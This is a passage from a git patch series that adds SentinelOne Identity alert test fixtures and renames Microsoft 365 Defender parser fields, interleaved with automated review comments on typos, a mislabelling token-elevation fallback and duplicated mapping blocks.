+ "name": "Domain Controller Discovery Detected",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_8.json b/SentinelOne/identity/tests/test_alert_8.json
new file mode 100644
index 000000000..384a41648
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_8.json
@@ -0,0 +1,34 @@
+{
+ "input": {
+ "message": "{\"id\": \"01935342-d073-7ed0-8c5e-2373fc013310\", \"name\": \"Default Admin Account Usage\", \"description\": \"This event is raised for default administrator account logon anywhere in the domain.\", \"detectedAt\": \"2024-11-22T09:45:07.655Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:07.655Z\", \"lastSeenAt\": \"2024-11-22T09:45:07.655Z\", \"process\": null, \"result\": null, \"storylineId\": null}"
+ },
+ "expected": {
+ "message": "{\"id\": \"01935342-d073-7ed0-8c5e-2373fc013310\", \"name\": \"Default Admin Account Usage\", \"description\": \"This event is raised for default administrator account logon anywhere in the domain.\", \"detectedAt\": \"2024-11-22T09:45:07.655Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:07.655Z\", \"lastSeenAt\": \"2024-11-22T09:45:07.655Z\", \"process\": null, \"result\": null, \"storylineId\": null}",
+ "event": {
+ "category": "intrusion_detection",
+ "end": "2024-11-22T09:45:07.655000Z",
+ "kind": "alert",
+ "provider": "Identity",
+ "reason": "This event is raised for default administrator account logon anywhere in the domain.",
+ "start": "2024-11-22T09:45:07.655000Z",
+ "type": "info"
+ },
+ "@timestamp": "2024-11-22T09:45:07.655000Z",
+ "observer": {
+ "product": "Singularity Identity",
+ "vendor": "SentinelOne"
+ },
+ "sentinelone": {
+ "identity": {
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": "UNKNOWN",
+ "confidenceLevel": "MALICIOUS",
+ "id": "01935342-d073-7ed0-8c5e-2373fc013310",
+ "name": "Default Admin Account Usage",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_9.json b/SentinelOne/identity/tests/test_alert_9.json
new file mode 100644
index 000000000..74ab3a7f3
--- /dev/null
+++ b/SentinelOne/identity/tests/test_alert_9.json
@@ -0,0 +1,34 @@
+{
+ "input": {
+ "message": "{\"id\": \"01935322-cc3a-76cc-890b-a1c2d1b815d4\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:10:09.467Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:10:09.467Z\", \"lastSeenAt\": \"2024-11-22T09:10:09.467Z\", \"process\": null, \"result\": null, \"storylineId\": null}"
+ },
+ "expected": {
+ "message": "{\"id\": \"01935322-cc3a-76cc-890b-a1c2d1b815d4\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:10:09.467Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:10:09.467Z\", \"lastSeenAt\": \"2024-11-22T09:10:09.467Z\", \"process\": null, \"result\": null, \"storylineId\": null}",
+ "event": {
+ "category": "intrusion_detection",
+ "end": "2024-11-22T09:10:09.467000Z",
+ "kind": "alert",
+ "provider": "Identity",
+ "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.",
+ "start": "2024-11-22T09:10:09.467000Z",
+ "type": "info"
+ },
+ "@timestamp": "2024-11-22T09:10:09.467000Z",
+ "observer": {
+ "product": "Singularity Identity",
+ "vendor": "SentinelOne"
+ },
+ "sentinelone": {
+ "identity": {
+ "attackSurfaces": [
+ "IDENTITY"
+ ],
+ "classification": "UNKNOWN",
+ "confidenceLevel": "MALICIOUS",
+ "id": "01935322-cc3a-76cc-890b-a1c2d1b815d4",
+ "name": "Brute force attack - Mass Account Lockout",
+ "status": "NEW"
+ }
+ }
+ }
+}
\ No newline at end of file
From e898b653c1cbe982f1f50db26b795f2e018db548 Mon Sep 17 00:00:00 2001
From: vg-svitla
Date: Wed, 27 Nov 2024 12:20:13 +0200
Subject: [PATCH 287/317] Apply linter
---
 SentinelOne/identity/_meta/smart-descriptions.json | 2 +-
 SentinelOne/identity/ingest/parser.yml | 2 +-
 SentinelOne/identity/tests/test_alert_2.json | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/SentinelOne/identity/_meta/smart-descriptions.json b/SentinelOne/identity/_meta/smart-descriptions.json
index ad570cb92..e09c5db80 100644
--- a/SentinelOne/identity/_meta/smart-descriptions.json
+++ b/SentinelOne/identity/_meta/smart-descriptions.json
@@ -43,4 +43,4 @@
 }
 ]
 }
-]
\ No newline at end of file
+]
diff --git a/SentinelOne/identity/ingest/parser.yml b/SentinelOne/identity/ingest/parser.yml
index 507745cb7..79cd3ec9f 100644
--- a/SentinelOne/identity/ingest/parser.yml
+++ b/SentinelOne/identity/ingest/parser.yml
@@ -64,4 +64,4 @@ stages:
 sentinelone.identity.classification: "{{json_event.message.classification}}"
 sentinelone.identity.confidenceLevel: "{{json_event.message.confidenceLevel}}"
 sentinelone.identity.result: "{{json_event.message.result}}"
- sentinelone.identity.storyLineId: "{{json_event.message.storyLineId}}"
\ No newline at end of file
+ sentinelone.identity.storyLineId: "{{json_event.message.storyLineId}}"
diff --git a/SentinelOne/identity/tests/test_alert_2.json b/SentinelOne/identity/tests/test_alert_2.json
index 6d697a5be..39420a5e0 100644
--- a/SentinelOne/identity/tests/test_alert_2.json
+++ b/SentinelOne/identity/tests/test_alert_2.json
@@ -19,4 +19,4 @@
 }
 }
 }
-}
+}
\ No newline at end of file
From 5421cd89a9054a25770e7ce2e8e8ef1c1c018655 Mon Sep 17 00:00:00 2001
From: vg-svitla Date: Wed, 27 Nov 2024 12:21:17 +0200 Subject: [PATCH 288/317] Fix datasources --- SentinelOne/identity/_meta/manifest.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/SentinelOne/identity/_meta/manifest.yml b/SentinelOne/identity/_meta/manifest.yml index 449172f8a..33be89396 100644 --- a/SentinelOne/identity/_meta/manifest.yml +++ b/SentinelOne/identity/_meta/manifest.yml @@ -6,3 +6,4 @@ description: >- SentinelOne Singularity Identity is a cybersecurity solution that provides identity protection and zero-trust security by continuously monitoring and analyzing user behaviors to detect and prevent potential threats. data_sources: + Application logs: activites performed on SentinelOne infrastructure are logged From 0c2434b976a689fa0b51c9337ae42ac599183414 Mon Sep 17 00:00:00 2001 
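Review bot: The added data-source entry `Application logs: activites performed on SentinelOne infrastructure are logged` misspells "activities" and says "SentinelOne infrastructure" although the `description` two context lines above is specifically about Singularity Identity. Suggest `Application logs: activities performed on SentinelOne Singularity Identity are logged`. This string is presumably shown to users as the module's data-source description, so it is worth correcting while the key is being introduced.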
From: LenaigKaliou Date: Wed, 27 Nov 2024 16:45:52 +0100 Subject: [PATCH 289/317] Changes on custom fields --- .../microsoft-365-defender/_meta/fields.yml | 254 ++++++++---------- .../microsoft-365-defender/ingest/parser.yml | 74 +++-- .../tests/test_device_event.json | 22 +- ...test_device_event_sensitive_file_read.json | 22 +- .../tests/test_device_events_2.json | 4 +- ...test_device_events_get_clipboard_data.json | 22 +- ...test_device_events_powershell_command.json | 22 +- ..._device_events_shell_link_create_file.json | 22 +- .../tests/test_device_file_event.json | 24 +- .../tests/test_device_file_event_02.json | 24 +- .../tests/test_device_image_load_event.json | 10 +- .../tests/test_device_logon_events.json | 6 +- .../tests/test_device_network_events.json | 26 +- .../tests/test_device_process_events.json | 42 ++- .../tests/test_device_process_events_2.json | 42 ++- .../tests/test_device_registry_events.json | 24 +- .../test_devices_events_script_content.json | 4 +- .../tests/test_email_events.json | 22 +- .../tests/test_email_url_info.json | 22 +- .../tests/test_identity_directory.json | 22 +- .../tests/test_identity_info.json | 22 +- .../tests/test_identity_logon.json | 22 +- .../tests/test_identity_query.json | 22 +- .../tests/test_local_ip.json | 22 +- .../tests/test_process_error.json | 12 +- 25 files changed, 364 insertions(+), 446 deletions(-) diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index 0e6154ccd..c92ffb8db 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml 
@@ -133,6 +133,78 @@ action.properties.ISP: name: action.properties.ISP type: keyword +action.properties.InitiatingProcessAccountObjectId: + description: Azure AD object ID of the user account that ran the process responsible + for the event + name: action.properties.InitiatingProcessAccountObjectId + type: keyword + +action.properties.InitiatingProcessCommandLine: + description: Process commande Line that initiated the event + name: action.properties.InitiatingProcessCommandLine + type: keyword + +action.properties.InitiatingProcessFileSize: + description: Size of the process (image file) that initiated the event + name: action.properties.InitiatingProcessFileSize + type: long + +action.properties.InitiatingProcessIntegrityLevel: + description: Integrity level of the process that initiated the event. Windows assigns + integrity levels to processes based on certain characteristics, such as if they + were launched from an internet download. These integrity levels influence permissions + to resources + name: action.properties.InitiatingProcessIntegrityLevel + type: keyword + +action.properties.InitiatingProcessLogonId: + description: Identifier for a logon session of the process that initiated the event. + This identifier is unique on the same machine only between restarts. 
+ name: action.properties.InitiatingProcessLogonId + type: keyword + +action.properties.InitiatingProcessTokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the process that initiated the event + name: action.properties.InitiatingProcessTokenElevation + type: keyword + +action.properties.InitiatingProcessVersionInfoCompanyName: + description: Company name from the version information of the process (image file) + responsible for the event + name: action.properties.InitiatingProcessVersionInfoCompanyName + type: keyword + +action.properties.InitiatingProcessVersionInfoFileDescription: + description: Description from the version information of the process (image file) + responsible for the event + name: action.properties.InitiatingProcessVersionInfoFileDescription + type: keyword + +action.properties.InitiatingProcessVersionInfoInternalFileName: + description: Internal file name from the version information of the process (image + file) responsible for the event + name: action.properties.InitiatingProcessVersionInfoInternalFileName + type: keyword + +action.properties.InitiatingProcessVersionInfoOriginalFileName: + description: Original file name from the version information of the process (image + file) responsible for the event + name: action.properties.InitiatingProcessVersionInfoOriginalFileName + type: keyword + +action.properties.InitiatingProcessVersionInfoProductName: + description: Product name from the version information of the process (image file) + responsible for the event + name: action.properties.InitiatingProcessVersionInfoProductName + type: keyword + +action.properties.InitiatingProcessVersionInfoProductVersion: + description: Product version from the version information of the process (image + file) responsible for the event + name: action.properties.InitiatingProcessVersionInfoProductVersion + type: keyword + action.properties.IsAdminOperation: description: 
Indicates whether the activity was performed by an administrator name: action.properties.IsAdminOperation 
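Review bot: The new `action.properties.InitiatingProcessCommandLine` entry keeps the typo of the field it replaces, `description: Process commande Line that initiated the event`; suggest `description: Command line of the process that initiated the event`. The same carry-over appears in the next hunk (`@@ -281,6 +353,51 @@`), where `action.properties.ProcessIntegrityLevel` reads `from an internet downloaded` and should be `from an internet download`. These descriptions are user-facing field documentation, so a rename commit is the natural place to fix them rather than re-propagating them under the new names.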
@@ -281,6 +353,51 @@ action.properties.PreviousRegistryValueName: name: action.properties.PreviousRegistryValueName type: keyword +action.properties.ProcessIntegrityLevel: + description: Integrity level of the newly created process. Windows assigns integrity + levels to processes based on certain characteristics, such as if they were launched + from an internet downloaded. These integrity levels influence permissions to resources + name: action.properties.ProcessIntegrityLevel + type: keyword + +action.properties.ProcessTokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the newly created process + name: action.properties.ProcessTokenElevation + type: keyword + +action.properties.ProcessVersionInfoCompanyName: + description: Company name from the version information of the newly created process + name: action.properties.ProcessVersionInfoCompanyName + type: keyword + +action.properties.ProcessVersionInfoFileDescription: + description: Description from the version information of the newly created process + name: action.properties.ProcessVersionInfoFileDescription + type: keyword + +action.properties.ProcessVersionInfoInternalFileName: + description: Internal file name from the version information of the newly created + process + name: action.properties.ProcessVersionInfoInternalFileName + type: keyword + +action.properties.ProcessVersionInfoOriginalFileName: + description: Original file name from the version information of the newly created + process + name: action.properties.ProcessVersionInfoOriginalFileName + type: keyword + +action.properties.ProcessVersionInfoProductName: + description: Product name from the version information of the newly created process + name: action.properties.ProcessVersionInfoProductName + type: keyword + +action.properties.ProcessVersionInfoProductVersion: + description: Product version from the version information of the newly created process + name: 
action.properties.ProcessVersionInfoProductVersion + type: keyword + action.properties.Query: description: String used to run the query name: action.properties.Query 
@@ -412,143 +529,6 @@ action.properties.UserLevelPolicy: name: action.properties.UserLevelPolicy type: keyword -action.properties.process.AccountObjectId: - description: Azure AD object ID of the user account that ran the process responsible - for the event - name: action.properties.process.AccountObjectId - type: keyword - -action.properties.process.CommandLine: - description: Process commande Line that initiated the event - name: action.properties.process.CommandLine - type: keyword - -action.properties.process.FileSize: - description: Size of the process (image file) that initiated the event - name: action.properties.process.FileSize - type: long - -action.properties.process.IntegrityLevel: - description: Integrity level of the newly created process. Windows assigns integrity - levels to processes based on certain characteristics, such as if they were launched - from an internet downloaded. These integrity levels influence permissions to resources - name: action.properties.process.IntegrityLevel - type: keyword - -action.properties.process.LogonId: - description: Identifier for a logon session of the process that initiated the event. - This identifier is unique on the same machine only between restarts. 
- name: action.properties.process.LogonId - type: keyword - -action.properties.process.TokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the newly created process - name: action.properties.process.TokenElevation - type: keyword - -action.properties.process.VersionInfoCompanyName: - description: Company name from the version information of the newly created process - name: action.properties.process.VersionInfoCompanyName - type: keyword - -action.properties.process.VersionInfoFileDescription: - description: Description from the version information of the newly created process - name: action.properties.process.VersionInfoFileDescription - type: keyword - -action.properties.process.VersionInfoInternalFileName: - description: Internal file name from the version information of the newly created - process - name: action.properties.process.VersionInfoInternalFileName - type: keyword - -action.properties.process.VersionInfoOriginalFileName: - description: Original file name from the version information of the newly created - process - name: action.properties.process.VersionInfoOriginalFileName - type: keyword - -action.properties.process.VersionInfoProductName: - description: Product name from the version information of the newly created process - name: action.properties.process.VersionInfoProductName - type: keyword - -action.properties.process.VersionInfoProductVersion: - description: Product version from the version information of the newly created process - name: action.properties.process.VersionInfoProductVersion - type: keyword - -action.properties.process.parent.AccountObjectId: - description: Azure AD object ID of the user account that ran the parent process - responsible for the event - name: action.properties.process.parent.AccountObjectId - type: keyword - -action.properties.process.parent.CommandLine: - description: Parent process commande Line that initiated the event - 
name: action.properties.process.parent.CommandLine - type: keyword - -action.properties.process.parent.FileSize: - description: Size of the parent process (image file) that initiated the event - name: action.properties.process.parent.FileSize - type: long - -action.properties.process.parent.IntegrityLevel: - description: Integrity level of the parent process that initiated the event. Windows - assigns integrity levels to processes based on certain characteristics, such as - if they were launched from an internet download. These integrity levels influence - permissions to resources - name: action.properties.process.parent.IntegrityLevel - type: keyword - -action.properties.process.parent.LogonId: - description: Identifier for a logon session of the parent process that initiated - the event. This identifier is unique on the same machine only between restarts. - name: action.properties.process.parent.LogonId - type: keyword - -action.properties.process.parent.TokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the parent process that initiated the event - name: action.properties.process.parent.TokenElevation - type: keyword - -action.properties.process.parent.VersionInfoCompanyName: - description: Company name from the version information of the parent process (image - file) responsible for the event - name: action.properties.process.parent.VersionInfoCompanyName - type: keyword - -action.properties.process.parent.VersionInfoFileDescription: - description: Description from the version information of the parent process (image - file) responsible for the event - name: action.properties.process.parent.VersionInfoFileDescription - type: keyword - -action.properties.process.parent.VersionInfoInternalFileName: - description: Internal file name from the version information of the parent process - (image file) responsible for the event - name: 
action.properties.process.parent.VersionInfoInternalFileName - type: keyword - -action.properties.process.parent.VersionInfoOriginalFileName: - description: '' - name: action.properties.process.parent.VersionInfoOriginalFileName - type: keyword - -action.properties.process.parent.VersionInfoProductName: - description: '' - name: action.properties.process.parent.VersionInfoProductName - type: keyword - -action.properties.process.parent.VersionInfoProductVersion: - description: Product version from the version information of the parent process - (image file) responsible for the event - name: action.properties.process.parent.VersionInfoProductVersion - type: keyword - email.direction: description: The direction of the message based on the sending and receiving domains name: email.direction diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index 0a33f577f..fc32171cd 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
@@ -263,18 +263,18 @@ stages:
 process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}"
 process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}"
 process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}"
- action.properties.process.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
- action.properties.process.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
- action.properties.process.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
- action.properties.process.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
- action.properties.process.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}"
- action.properties.process.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
- action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
- action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
- action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}"
- action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}"
- action.properties.process.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}"
- action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}"
+ action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
+ action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
+ action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
+ action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
+ action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}"
+ action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
+ action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
+ action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
+ action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}"
+ action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}"
+ action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}"
+ action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}"
 
 - set:
 process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}'
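Review bot: `action.properties.InitiatingProcessTokenElevation` is filled from `InitiatingProcessTokenElevation or ProcessTokenElevation`, so when the initiating-process value is absent the field silently receives the created process's token elevation under a name that now explicitly says "InitiatingProcess". The fallback was defensible under the old generic `action.properties.process.TokenElevation`, but with the flat source-named keys it mislabels data, and the `@@ -307,26 +307,26 @@` hunk below maps the same key without the fallback while exposing `action.properties.ProcessTokenElevation` separately, so the two stages now disagree. Suggest `action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}"` here plus a separate `action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"` line if that value is still wanted for this event type. The enclosing `set` block starts outside the hunk.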
@@ -307,26 +307,26 @@ stages:
 process.name: "{{json_event.message.properties.FileName | basename}}"
 process.command_line: "{{json_event.message.properties.ProcessCommandLine}}"
 process.working_directory: "{{json_event.message.properties.FolderPath | dirname}}"
- action.properties.process.TokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
- action.properties.process.IntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}"
- action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}"
- action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}"
- action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}"
- action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}"
- action.properties.process.VersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}"
- action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}"
- action.properties.process.parent.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
- action.properties.process.parent.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
- action.properties.process.parent.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
- action.properties.process.parent.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
- action.properties.process.parent.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}"
- action.properties.process.parent.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
- action.properties.process.parent.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
- action.properties.process.parent.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
- action.properties.process.parent.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}"
- action.properties.process.parent.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}"
- action.properties.process.parent.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}"
- action.properties.process.parent.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}"
+ action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
+ action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}"
+ action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}"
+ action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}"
+ action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}"
+ action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}"
+ action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}"
+ action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}"
+ action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}"
+ action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}"
+ action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}"
+ action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}"
+ action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}"
+ action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
+ action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}"
+ action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}"
+ action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}"
+ action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}"
+ action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}"
+ action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}"
 
 - set:
 process.parent.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}'
@@ -418,7 +418,6 @@ stages:
 event.dataset: "device_events"
 event.category: ["host"]
 action.properties.RemoteDeviceName: "{{json_event.message.properties.RemoteDeviceName}}"
- #action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}"
 set_device_file_certificate_info_fields:
 actions:
 - set:
@@ -531,15 +530,6 @@ stages:
 - set:
 event.dataset: "device_process_events"
 event.category: ["process"]
- #process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}"
- #process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}"
- #action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}"
- #action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}"
- #action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}"
- #action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}"
- #action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}"
- #action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}"
- #action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}"
 set_device_registry_events_fields:
 actions:
 - set:
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event.json b/Microsoft/microsoft-365-defender/tests/test_device_event.json
index 17cad5081..ca708b0ed 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event.json
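Review bot: The twelve `action.properties.InitiatingProcess*` assignments added in this hunk duplicate, line for line, the block added in the `@@ -263,18 +263,18 @@` hunk above, and the two copies already differ in how `InitiatingProcessTokenElevation` is sourced, which is exactly the drift that verbatim duplication invites. If the parser format allows a shared stage or include, factoring the InitiatingProcess* mapping into one definition referenced from both event paths would remove the risk; if it does not, a comment at the top of each copy, e.g. `# keep in sync with the InitiatingProcess* block in the other process-mapping stage`, at least makes the coupling visible to the next editor. The enclosing `set` block starts outside the hunk.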
@@ -16,18 +16,16 @@
 "@timestamp": "2022-09-01T07:09:47.498056Z",
 "action": {
 "properties": {
- "process": {
- "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
- "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
- "FileSize": 14687048,
- "LogonId": "121834210",
- "VersionInfoCompanyName": "Google",
- "VersionInfoFileDescription": "Software Reporter Tool",
- "VersionInfoInternalFileName": "software_reporter_tool_exe",
- "VersionInfoOriginalFileName": "software_reporter_tool.exe",
- "VersionInfoProductName": "Software Reporter Tool",
- "VersionInfoProductVersion": "102.286.200"
- }
+ "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+ "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+ "InitiatingProcessFileSize": 14687048,
+ "InitiatingProcessLogonId": "121834210",
+ "InitiatingProcessVersionInfoCompanyName": "Google",
+ "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
+ "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
+ "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
+ "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
+ "InitiatingProcessVersionInfoProductVersion": "102.286.200"
 },
 "type": "NtAllocateVirtualMemoryApiCall"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
index 413d002c1..2655cb069 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json
@@ -23,18 +23,16 @@
 "action": {
 "properties": {
